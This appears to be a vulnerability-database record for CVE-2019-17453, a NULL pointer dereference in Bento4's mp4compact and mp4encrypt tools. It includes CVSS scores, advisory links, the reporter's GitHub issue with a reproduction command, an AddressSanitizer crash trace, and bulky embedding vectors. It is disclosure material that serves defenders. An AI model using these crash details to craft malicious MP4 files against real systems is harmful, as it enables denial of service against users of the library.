-0.006938860286027193, 0.004236031789332628, -0.004212021827697754, 0.0016746902838349342, -0.01896095834672451, -0.004966618958860636, -0.016491370275616646, 0.009576519019901752, -0.011607070453464985, 0.0012150723487138748, 0.025080053135752678, -0.04036406800150871, -0.020017394796013832, -0.02134822867810726, 0.006050494033843279, -0.02052503265440464, -0.0002919775142800063, -0.011017112992703915, -0.016724608838558197, -0.011984368786215782, -0.017355725169181824, -0.009933237917721272, -0.02820819988846779, -0.015530973672866821, 0.01929023675620556, -0.00431149173527956, -0.011360111646354198, 0.005275317467749119, -0.00959709845483303, -0.020483871921896935, -0.008602403104305267, -0.016436489298939705, 0.00700059998780489, 0.009089461527764797, -0.03353153541684151, -0.007532247807830572, -0.013335783034563065, -0.006393492687493563, 0.00717552937567234, 0.002248355420306325, 0.02631484717130661, -0.01544865407049656, -0.007895826362073421, -0.014982176013290882, -0.007367608603090048, 0.0037935636937618256, 0.018453320488333702, 0.0031195716001093388, -0.008705303072929382, 0.012766405008733273, 0.003769553964957595, -0.02167750708758831, -0.011202331632375717, 0.006331752985715866, -0.008424043655395508, -0.012279347516596317, -0.021567746996879578, 0.01144243124872446, -0.0032087513245642185, 0.025272130966186523, -0.011600210331380367, 0.004078252706676722, 0.010770154185593128, 0.01435105875134468, -0.003292785957455635, -0.004863718990236521, 0.0015126235084608197, 0.0032824960071593523, -0.0035328848753124475, 0.014172699302434921, 0.007971285842359066, -0.01013217680156231, 0.010200776159763336, 0.01860423944890499, 0.010550634935498238, -0.026959683746099472, -0.006105374079197645, -0.005470826756209135, 0.0020940059330314398, -0.034601692110300064, -0.005614886060357094, 0.0072578489780426025, 0.03473889082670212, 0.006170543376356363, -0.016820648685097694, 0.0015992306871339679, 0.01975671574473381, 0.007182389032095671, -0.005278747528791428, -0.006516972091048956, 0.01109257247298956, 0.01760268397629261, 0.0036940942518413067, -0.011737409979104996, -0.023255299776792526, 0.022171424701809883, -0.00468192994594574, 0.007676307111978531, 0.010091017000377178, 0.013500422239303589, 0.011476730927824974, 0.006167113780975342, -0.021265909075737, 0.006077934056520462, -0.01562701351940632, -0.016518808901309967, -0.01172368973493576, -0.0029909471049904823, 0.0226241834461689, 0.007669446989893913, -0.017945682629942894, -0.0054502468556165695, -0.0020905761048197746, -0.014803816564381123, -0.004932318814098835, -0.00744992820546031, 0.020209472626447678, -0.0023958447854965925, -0.02531329169869423, -0.01824752241373062, -0.02672644518315792, 0.038443274796009064, 0.006582141853868961, 0.014419658109545708, -0.015970012173056602, -0.004843139089643955, -0.00023066651192493737, -0.01177170965820551, 0.007285289000719786, -0.007401908282190561, 0.024682173505425453, -0.0031830263324081898, -0.013376942835748196, -0.0058035352267324924, 0.01200494822114706, 0.01565445214509964, 0.011051412671804428, 0.012457706965506077, -0.023488540202379227, -0.00005228048030403443, 0.02667156606912613, 0.015023335814476013, -0.014090379700064659, 0.009988117031753063, 0.011325811967253685, 0.00400279276072979, -0.002560483990237117, -0.0009998406749218702, -0.0027954380493611097, 0.01819264143705368, 0.004510430619120598, -0.012251907959580421, 0.0010041282512247562, -0.002423284575343132, 0.00909632071852684, 0.018439600244164467, -0.0045172907412052155, 0.011833448894321918, -0.007834086194634438, 0.011195472441613674, -0.0009149485849775374, -0.020922910422086716, 0.001994536491110921, -0.0013625617139041424, -0.020182034000754356, -0.008341724053025246, -0.00973429810255766, -0.014158979058265686, 0.004054242745041847, -0.015928851440548897, 0.005491406656801701, -0.02501145377755165, 0.010022416710853577, -0.014707776717841625, 0.017438044771552086, -0.0018384720897302032, -0.018617959693074226, -0.001111315214075148, 0.00440753111615777, -0.004448690917342901, 0.01472149696201086, -0.027714282274246216, -0.007285289000719786, -0.026630405336618423, 0.00035650411155074835, 0.029936911538243294, -0.00853380374610424, -0.006201413460075855, 0.008986561559140682, -0.023845257237553596, -0.020209472626447678, -0.004781399387866259, 0.008273124694824219, -0.0061431038193404675, -0.006071073934435844, 0.007518528029322624, -0.013438682071864605, 0.009713718667626381, 0.00782722607254982, -0.019358837977051735, -0.012437126599252224, -0.016079770401120186, -0.02557397074997425, 0.006757071241736412, -0.002505604177713394, 0.005230727605521679, -0.0020820011850446463, -0.0018350421451032162, -0.022514423355460167, -0.008890521712601185, 0.02300834096968174, -0.004620190244168043, -0.0005972461658529937, 0.0013368367217481136, 0.008424043655395508, 0.0013917165342718363, 0.009631399065256119, -0.0020494163036346436, -0.006842820905148983, 0.01376110129058361, -0.002877757651731372, -0.000012842347132391296, -0.010927933268249035, -0.005680055823177099, -0.019070718437433243, 0.031089387834072113, 0.00567662576213479, 0.009699998423457146, 0.004294341430068016, 0.008835642598569393, -0.017726164311170578, 0.002826307900249958, -0.001949946628883481, -0.0035431748256087303, 0.0033476657699793577, 0.0016506804386153817, -0.004507000558078289, -0.008869942277669907, -0.0014071514597162604, -0.0004090257571078837, 0.023433659225702286, 0.02805727906525135, -0.00622542342171073, -0.013898300938308239, -0.008986561559140682, 0.026150207966566086, 0.012835005298256874, -0.022912301123142242, 0.002083715982735157, -0.021485427394509315, 0.022377224639058113, 0.0010838753078132868, 0.001927651697769761, -0.016107210889458656, -0.009288400411605835, -0.005882424768060446, -0.02598556876182556, 0.008334863930940628, -0.0034985849633812904, 0.008972841314971447, 0.003388825571164489, -0.003176166443154216, 0.011360111646354198, -0.00021083690808154643, -0.00840346422046423, 0.007930126041173935, -0.005601165816187859, -0.006294023245573044, 0.00841718353331089, -0.0010049856500700116, 0.009706858545541763, -0.020607352256774902, -0.011216051876544952, -0.013479841873049736, -0.002032266231253743, -0.001462031272239983, 0.001528915949165821, -0.014035499654710293, 0.0021094409748911858, -0.02944299392402172, 0.015133094973862171, 0.016724608838558197, 0.008465203456580639, -0.013966900296509266, -0.0037901338655501604, 0.012245047837495804, 0.009370720013976097, 0.021375669166445732, 0.017534084618091583, -0.0018521921010687947, 0.012821285054087639, 0.0012596620945259929, 0.021951906383037567, 0.00015091935347300023, -0.008849361911416054, -0.011250351555645466, 0.015187975019216537, 0.014145259745419025, -0.005045508500188589, 0.019976234063506126, 0.011106292717158794, 0.006554701831191778, 0.007950706407427788, -0.007895826362073421, -0.015750491991639137, -0.03237906098365784, -0.008328004740178585, 0.011332671158015728, 0.014927295967936516, 0.0024781643878668547, -0.015544693917036057, 0.013020223937928677, -0.010139036923646927, 0.006191123276948929, -0.0026822485961019993, -0.0043046316131949425, -0.002889762632548809, 0.004297771491110325, 0.001375424093566835, -0.005892714951187372, 0.011936348862946033, -0.010797593742609024, -0.0036769441794604063, 0.018357280641794205, 0.01489985641092062, 0.010495754890143871, 0.007985006086528301, -0.003327085869386792, 0.001654967898502946, 0.009110040962696075, -0.009034581482410431, -0.012615486048161983, -0.0006881408044137061, -0.0002448151935823262, -0.01996251381933689, -0.018096603453159332, -0.012217607349157333, -0.00527188740670681, -0.005319907329976559, -0.005734935402870178, 0.0024284296669065952, 0.0025964989326894283, 0.010097877122461796, 0.027028284966945648, 0.016738329082727432, 0.01949603669345379, -0.00007192250632215291, 0.02239094488322735, 0.0027354133781045675, -0.015338893979787827, 0.009206080809235573, -0.010934793390333652, 0.0013025369262322783, 0.016793208196759224, -0.011860889382660389, -0.016436489298939705, 0.01004299707710743, 0.01736944541335106, 0.0012699520448222756, 0.016902968287467957, -0.021787267178297043, 0.031528424471616745, -0.00518270768225193, 0.020991509780287743, 0.01647765003144741, -0.017643844708800316, 0.023913858458399773, -0.003886173479259014, 0.008053605444729328, -0.008273124694824219, 0.01706760749220848, -0.03641272336244583, 0.011456150561571121, 0.004784829448908567, 0.00980289839208126, -0.0074842278845608234, 0.005223867483437061, 0.046181321144104004, -0.0037798439152538776, -0.02551909163594246, -0.025080053135752678, 0.0014440238010138273, 0.004874009173363447, -0.004023372661322355, 0.023502258583903313, -0.007134369574487209, 0.006729631219059229, 0.0032190412748605013, 0.0022432103287428617, 0.008369164541363716, -0.0034351302310824394, 0.007964425720274448, -0.012437126599252224, -0.025820929557085037, 0.00917178113013506, 0.008842501789331436, -0.005806965287774801, 0.0058995746076107025, 0.004870579112321138, 0.03240650147199631, -0.012656645849347115, 0.010241935960948467, -0.018124042078852654, -0.005724645685404539, -0.007497948128730059, -0.027590801939368248, -0.01511937566101551, 0.000738304341211915, 0.003848443506285548, 0.013836560770869255, -0.002184900688007474, -0.0046373400837183, 0.0004690504865720868, 0.009514778852462769, 0.0017733024433255196, -0.0006941432948224247, -0.004445260856300592, -0.005498266313225031, 0.006204843521118164, -0.004695649724453688, 0.009308979846537113, 0.022816263139247894, 0.012835005298256874, -0.008890521712601185, -0.01677948795258999, -0.03720847889780998, 0.007031470071524382, 0.006702191196382046, -0.0008514938526786864, -0.017849642783403397, -0.008485783822834492, -0.013891440816223621, 0.005072948057204485, 0.012690945528447628, -0.0204701516777277, -0.0020597062539309263, 0.01639533042907715, 0.0007421631016768515, -0.023680618032813072, -0.0027491331566125154, 0.005529136396944523, 0.0305405892431736, 0.0018093172693625093, -0.016710888594388962, 0.00290862750262022, 0.008890521712601185, -0.006088223773986101, -0.003263631137087941, -0.007758626714348793, 0.02802984043955803, -0.018590521067380905, -0.011668809689581394, 0.008465203456580639, 0.002210625447332859, -0.029497873038053513, 0.005319907329976559, -0.012334227561950684, 0.0010127031709998846, 0.0074842278845608234, -0.006873690523207188, 0.019262798130512238, 0.015366334468126297, 0.013027084060013294, 0.003982212860137224, 0.02870211750268936, -0.02226746454834938, -0.013191723264753819, 0.016024891287088394, 0.0026633834931999445, 0.016381610184907913, -0.021567746996879578, -0.013713081367313862, 0.003467715112492442, 0.010715274140238762, 0.022432103753089905, 0.006980020087212324, 0.006434652488678694, -0.003680374240502715, -0.02152658812701702, -0.01395318005234003, -0.005601165816187859, -0.0015640732599422336, -0.01345240231603384, -0.002852032892405987, -0.007655727211385965, -0.002785148099064827, -0.005556576419621706, 0.010228216648101807, -0.021005230024456978, 0.005889284890145063, 0.015764212235808372, -0.01048203557729721, -0.004013082943856716, -0.0049528987146914005, -0.012375387363135815, 0.010557495057582855, -0.03295530006289482, -0.01314370334148407, -0.010735854506492615, -0.025889528915286064, -0.0040370929054915905, -0.01345240231603384, -0.012265627272427082, -0.002632513642311096, -0.012066688388586044, -0.005608025938272476, -0.011915769428014755, 0.0016429629176855087, 0.0014834686880931258, 0.01998995430767536, 0.019454875960946083, 0.008890521712601185, -0.017712444067001343, 0.006516972091048956, 0.014803816564381123, 0.005498266313225031, -0.01734200492501259, 0.00973429810255766, 0.015284014865756035, -0.02106010913848877, 0.0020785711240023375, -0.01468033716082573, 0.008081045001745224, 0.012190167792141438, -0.004301201552152634, 0.005927014630287886, 0.0011053127236664295, 0.0015452083898708224, 0.005587446037679911, 0.014556857757270336, 0.019866475835442543, 0.006746781058609486, -0.004335501231253147, 0.005964744370430708, -0.010125316679477692, -0.0014294463908299804, 0.008911102078855038, 0.02088174968957901, 0.0006919995648786426, -0.007621427532285452, 0.0016446779482066631, 0.008122204802930355, 0.02475077472627163, 0.01413153950124979, -0.01487241592258215, 0.027563361451029778, -0.002196905668824911, -0.007511667907238007, -0.01076329406350851, -0.004884298890829086, -0.013678781688213348, 0.010777014307677746, -0.03139122575521469, 0.012883025221526623, 0.006331752985715866, 0.013424962759017944, 0.00440753111615777, 0.001263949554413557, -0.0031675915233790874, -0.0006984307547099888, -0.0028537476900964975, -0.017712444067001343, -0.027028284966945648, -0.02933323383331299, 0.0004488993145059794, -0.008129064925014973, -0.015105655416846275, -0.006160253658890724, -0.013706221245229244, 0.005762375425547361, -0.004784829448908567, -0.009837198071181774, -0.0014414513716474175, 0.017726164311170578, 0.002702828496694565, 0.0035431748256087303, 0.014062940143048763, 0.016697168350219727, -0.029964352026581764, 0.02014087326824665, -0.005436526611447334, 0.02265162393450737, 0.0036117746494710445, -0.02267906256020069, -0.01304080430418253, -0.009281540289521217, 0.0017047027358785272, -0.007504807785153389, -0.003642644500359893, -0.009247240610420704, 0.017877083271741867, -0.005289037246257067, 0.02392757683992386, 0.002371834823861718, 0.00522729754447937, -0.01450197771191597, 0.010077296756207943, 0.007882106117904186, 0.01688924804329872, 0.013479841873049736, 0.021183589473366737, -0.01811032183468342, -0.0023443950340151787, -0.004654489923268557, 0.018206361681222916, -0.013623901642858982, 0.012011808343231678, 0.002057991223409772, 0.007607707288116217, -0.01629929058253765, -0.0030629769898951054, -0.016079770401120186, 0.009267820045351982, -0.0062391432002186775, 0.02359829843044281, -0.02082687057554722, -0.005628605838865042, 0.00936385989189148, 0.002651378745213151, -0.02472333423793316, -0.013102543540298939, 0.014598017558455467, -0.005529136396944523, -0.0035431748256087303, 0.0009826908353716135, -0.002743988297879696, -0.0009741158573888242, -0.0033991155214607716, -0.014474538154900074, 0.0005625176127068698, -0.014145259745419025, -0.0049117389135062695, -0.0005136402905918658, 0.020621072500944138, 0.028455158695578575, 0.028510037809610367, -0.008081045001745224, -0.013253463432192802, 0.0012133573181927204, -0.014556857757270336, -0.008019305765628815, -0.010742713697254658, 0.002057991223409772, 0.007696887012571096, 0.005415946710854769, 0.007806646637618542, 0.017438044771552086, -0.004853429272770882, -0.023708058521151543, 0.01665600948035717, 0.003165876492857933, -0.0027079733554273844, 0.0063660526648163795, 0.001095880288630724, 0.00600247411057353, -0.012197027914226055, 0.01645020954310894, 0.002718263305723667, -0.00304239708930254, 0.00363235455006361, 0.010921073146164417, 0.002457584487274289, 0.01698528788983822, 0.018000563606619835, -0.005573726259171963, 0.005371356848627329, 0.00018253953021485358, -0.0054571065120399, -0.009693138301372528, 0.0016395329730585217, 0.02501145377755165, 0.014049219898879528, 0.027961241081357002, 0.0074293483048677444, 0.014598017558455467, 0.015846531838178635, 0.0012579470640048385, -0.0133495032787323, 0.021169869229197502, 0.004057672806084156, -0.03976038843393326, 0.018508201465010643, -0.004342361353337765, 0.0321321040391922, 0.005213577765971422, -0.00342998537234962, 0.005066088400781155, -0.01236166711896658, 0.01898839883506298, 0.013150563463568687, -0.01393946073949337, -0.009075741283595562, -0.016162090003490448, 0.016381610184907913, -0.004994058515876532, -0.0266990065574646, 0.01618953049182892, -0.01531145442277193, -0.020717110484838486, 0.016162090003490448, 0.004695649724453688, -0.0024027046747505665, 0.00377298379316926, -0.005649185739457607, -0.0041880118660628796, 0.013946319930255413, 0.014090379700064659, -0.01181286945939064, -0.00146546121686697, -0.0020528461318463087, -0.02705572359263897, -0.005779525265097618, 0.008643562905490398, 0.007353888358920813, -0.012155868113040924, -0.013905160129070282, -0.009830337949097157, -0.0035500347148627043, -0.0024815944489091635, -0.008931681513786316, -0.007875245995819569, -0.017383165657520294, -0.015997450798749924, -0.000973258342128247, -0.02282998152077198, -0.015229134820401669, 0.011264071799814701, 0.01245084684342146, 0.008252544328570366, -0.03333945572376251, -0.006945720408111811, -0.00744992820546031, 0.003224186133593321, 0.03237906098365784, -0.001517768483608961, -0.000023674938347539864, 0.004088542424142361, -0.03858047351241112, 0.0025827789213508368, 0.0024472945369780064, 0.0036940942518413067, 0.0015469234203919768, 0.025711169466376305, 0.009391299448907375, 0.007347028702497482, -0.022871142253279686, -0.012368527241051197, -0.004472700878977776, 0.00018886355974245816, 0.02587580867111683, 0.004129702225327492, -0.005611455999314785, 0.01665600948035717, -0.01975671574473381, 0.005484546534717083, 0.0020597062539309263, -0.0002836169151123613, -0.004458981100469828, 0.004294341430068016, -0.010598654858767986, -0.007017749827355146, -0.004023372661322355, -0.011655090376734734, -0.004277191590517759, -0.00613624369725585, -0.008252544328570366, -0.0046990797854959965, -0.0019928214605897665, 0.008321144618093967, -0.010639814659953117, 0.003519164863973856, 0.004568740259855986, -0.0020614212844520807, 0.011778569780290127, -0.005357637070119381, -0.02111499011516571, 0.01793196238577366, -0.01937255635857582, 0.00949419941753149, -0.007189249154180288, -0.004990628454834223, -0.018151482567191124, -0.015901412814855576, -0.009514778852462769, 0.02185586653649807, -0.018316121771931648, -0.002222630428150296, 0.001689267810434103, -0.012347946874797344, 0.02820819988846779, 0.0021831856574863195, 0.004579030442982912, 0.00976173859089613, -0.01801428198814392, -0.01135325152426958, 0.0070589096285402775, 0.019660675898194313, 0.018096603453159332, -0.015338893979787827, 0.001338551752269268, -0.006980020087212324, -0.0023443950340151787, 0.022788822650909424, 0.005553146358579397, -0.032708339393138885, 0.0016309580532833934, -0.02711060456931591, -0.025916969403624535, 0.02282998152077198, 0.021265909075737, 0.01870027929544449, 0.005453676450997591, 0.0013359793229028583, -0.003500299993902445, -0.001756152487359941, -0.0031898864544928074, 0.005542856175452471, 0.005230727605521679, -0.010317395441234112, -0.002502174349501729, -0.005848125088959932, 0.01795940287411213, -0.015160535462200642, 0.04719659686088562, 0.009603958576917648, 0.02357085980474949, 0.02103267051279545, 0.0012931044911965728, 0.002629083814099431, 0.00035564659629017115, -0.0018298971699550748, -0.007477367762476206, 0.022432103753089905, -0.0001985104026971385, 0.006043633911758661, 0.0014200139557942748, -0.006088223773986101, -0.008424043655395508, 0.006005904171615839, -0.003941053058952093, -0.019619515165686607, -0.005203287582844496, -0.013253463432192802, -0.006167113780975342, -0.014474538154900074, 0.023762937635183334, -0.013370082713663578, 0.004170862026512623, 0.013418102636933327, 0.01489985641092062, -0.008183944970369339, 0.008369164541363716, -0.022130265831947327, 0.03646760433912277, -0.0003369960468262434, -0.005120967980474234, 0.004575600381940603, -0.00931583996862173, -0.007367608603090048, 0.011168031953275204, 0.020209472626447678, 0.009837198071181774, -0.011174892075359821, -0.009878357872366905, -0.011511030606925488, -0.004479561001062393, -0.01677948795258999, 0.013164283707737923, -0.010228216648101807, 0.013308343477547169, 0.010921073146164417, 0.010036136955022812, 0.025532810017466545, 0.02114242874085903, -0.008760182186961174, -0.018316121771931648, -0.009418739937245846, -0.009151200763881207, 0.006894270423799753, 0.009322700090706348, -0.0009483909234404564, 0.004688790068030357, -0.004582460504025221, -0.011655090376734734, -0.019070718437433243, -0.016614848747849464, 0.013390663079917431, -0.03139122575521469, -0.013342643156647682, 0.012512586079537868, 0.019331397488713264, -0.01996251381933689, 0.013527861796319485, -0.000035720080632017925, 0.002733698347583413, -0.015256574377417564, -0.00016817646974232048, -0.005127828102558851, -0.004338931292295456, 0.010283095762133598, 0.0007863241480663419, -0.003971923142671585, -0.002718263305723667, 0.0003204892564099282, -0.009075741283595562, 0.004527580458670855, -0.007278428878635168, 0.00234096497297287, -0.0074293483048677444, -0.003917043097317219, -0.0034317004028707743, 0.009446179494261742, 0.014213859103620052, -0.0017115626251325011, 0.005141547881066799, -0.024709613993763924, -0.005028358660638332, 0.012876165099442005, -0.00649639219045639, -0.0017767323879525065, -0.01612093113362789, 0.017534084618091583, 0.01507821585983038, -0.002435289556160569, -0.005975034553557634, -0.02155402861535549, 0.011970648542046547, 0.02480565384030342, -0.0006714196060784161, -0.007559687830507755, 0.0018024572636932135, -0.002797153079882264, 0.021993065252900124, 0.0008433476323261857, -0.0025930688716471195, -0.012197027914226055, 0.0018933519022539258, 0.0038038536440581083, 0.0008815062465146184, -0.013582741841673851, -0.01721852645277977, 0.01660112850368023, 0.0014568862970918417, -0.007806646637618542, -0.008307424373924732, 0.007786066737025976, 0.011545330286026001, 0.011216051876544952, -0.012107848189771175, 0.020922910422086716, 0.028866756707429886, 0.014639177359640598, -0.0074842278845608234, 0.010036136955022812, -0.01548981387168169, 0.02277510240674019, 0.010475175455212593, 0.019043277949094772, 0.018713999539613724, -0.028372839093208313, -0.003941053058952093, -0.0051106782630085945, 0.0015409209299832582, -0.006125953979790211, 0.03440961241722107, -0.01898839883506298, -0.00663702143356204, 0.014433378353714943, 0.010392855852842331, 0.015105655416846275, -0.0034471352118998766, -0.0017887373687699437, -0.015942571684718132, 0.001905356883071363, -0.014419658109545708, 0.023680618032813072, 0.012107848189771175, 0.0031830263324081898, 0.00170384522061795, -0.010070436634123325, 0.011613930575549603, -0.009398159570991993, 0.005340487230569124, -0.00422231201082468, 0.01863167993724346, -0.002467874437570572, 0.011881468817591667, 0.00004287481715437025, 0.010694693773984909, 0.008218244649469852, -0.02285742200911045, 0.005223867483437061, -0.002382124774158001, -0.005515416618436575, -0.012855584733188152, 0.0031933162827044725, -0.027782881632447243, 0.011250351555645466, -0.003397400490939617, 0.007834086194634438, -0.020223192870616913, 0.005978464614599943, 0.0019207918085157871, 0.01221074815839529, 0.023200420662760735, -0.008972841314971447, 0.006472382228821516, 0.05262969434261322, -0.0011696249712258577, -0.013397522270679474, -0.004764249548316002, 0.0036700842902064323, 0.005957884714007378, -0.004891159012913704, -0.01813776232302189, 0.018686560913920403, 0.022349784150719643, -0.00744992820546031, 0.011984368786215782, 0.01081131398677826, -0.007559687830507755, 0.024448934942483902, -0.011126872152090073, 0.002647948684170842, -0.01023507583886385, -0.0070589096285402775, 0.023131821304559708 ]
189
CVE-2019-17453
2019-10-10T17:15:17.843000
Bento4 1.5.1.0 has a NULL pointer dereference in AP4_DescriptorListWriter::Action in Core/Ap4Descriptor.h, related to AP4_IodsAtom::WriteFields in Core/Ap4IodsAtom.cpp, as demonstrated by mp4encrypt or mp4compact.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/436" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/437" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/436
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
**System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 Compacter - Version 1.0 (Bento4 Version 1.5.1.0) **Command** mp4compact POC /dev/null **ASAN Output** ``` ASAN:DEADLYSIGNAL ================================================================= ==5286==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000544c94 bp 0x7ffd515e2390 sp 0x7ffd515e22b0 T0) #0 0x544c93 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 #1 0x698656 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x698656 in AP4_InitialObjectDescriptor::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:300 #3 0x5974e8 in AP4_Expandable::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Expandable.cpp:105:5 #4 0x585e34 in AP4_IodsAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:99:36 #5 0x536b11 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #6 0x53c322 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #7 0x54dbfe in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #8 0x54dbfe in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Processor.cpp:644 #9 0x5262cf in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:220:14 #10 0x7f91a991a82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x4509e8 in _start (/home/fuzzer/victim/Bento4/mp4compact+0x4509e8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==5286==ABORTING ```
SEGV in mp4compact
https://api.github.com/repos/axiomatic-systems/Bento4/issues/436/comments
0
2019-09-30T07:47:11
2019-10-08T05:14:45Z
https://github.com/axiomatic-systems/Bento4/issues/436
500,109,805
436
true
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : SEGV in mp4compact Issue date: --- start body --- **System Details** Commit ID: bc1b02a Test Machine : Ubuntu 16.04.3 LTS MP4 Compacter - Version 1.0 (Bento4 Version 1.5.1.0) **Command** mp4compact POC /dev/null **ASAN Output** ``` ASAN:DEADLYSIGNAL ================================================================= ==5286==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000544c94 bp 0x7ffd515e2390 sp 0x7ffd515e22b0 T0) #0 0x544c93 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 #1 0x698656 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #2 0x698656 in AP4_InitialObjectDescriptor::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:300 #3 0x5974e8 in AP4_Expandable::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Expandable.cpp:105:5 #4 0x585e34 in AP4_IodsAtom::WriteFields(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:99:36 #5 0x536b11 in AP4_Atom::Write(AP4_ByteStream&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:229:14 #6 0x53c322 in AP4_AtomListWriter::Action(AP4_Atom*) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Atom.cpp:753:5 #7 0x54dbfe in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4List.h:353:9 #8 0x54dbfe in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Processor.cpp:644 #9 0x5262cf in main /home/fuzzer/victim/Bento4/Source/C++/Apps/Mp4Compact/Mp4Compact.cpp:220:14 #10 0x7f91a991a82f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291 #11 0x4509e8 in _start (/home/fuzzer/victim/Bento4/mp4compact+0x4509e8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/fuzzer/victim/Bento4/Source/C++/Core/Ap4Descriptor.h:108:16 in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==5286==ABORTING ``` --- end body ---
2,378
[ -0.011965548619627953, 0.04515301063656807, -0.0026640277355909348, -0.005301716271787882, 0.03293159604072571, 0.00030078491545282304, -0.0481933169066906, 0.05526728555560112, -0.02752828598022461, 0.029590273275971413, -0.03549026697874069, -0.001637737383134663, 0.013734040781855583, 0.012364399619400501, 0.028581857681274414, -0.008977923542261124, -0.035189248621463776, 0.0031964569352567196, -0.017398960888385773, -0.01608952321112156, 0.04437036067247391, -0.04196219891309738, -0.014223198406398296, 0.04744076356291771, -0.024006351828575134, 0.01622498221695423, -0.03786832466721535, 0.013884550891816616, -0.0021918024867773056, 0.029439764097332954, -0.021613242104649544, 0.011498967185616493, -0.007175566162914038, 0.012093481607735157, 0.04816321283578873, 0.007596994284540415, 0.05647136643528938, 0.03853056952357292, 0.00221626041457057, 0.04421985149383545, 0.00772116519510746, -0.047350458800792694, -0.03217904642224312, 0.008473715744912624, -0.00046328871394507587, 0.028912978246808052, 0.02487931028008461, -0.009105857461690903, -0.03371424973011017, 0.008330730721354485, 0.017173195257782936, -0.0023592449724674225, -0.03260047361254692, -0.06080605834722519, 0.0254211463034153, -0.02566196210682392, 0.022079823538661003, 0.02280227094888687, -0.0014129129704087973, 0.021778803318738937, -0.03335302323102951, -0.0033808317966759205, 0.0008367417613044381, 0.01290623564273119, 0.02716706320643425, 0.000949153967667371, -0.005290427710860968, -0.004917915444821119, 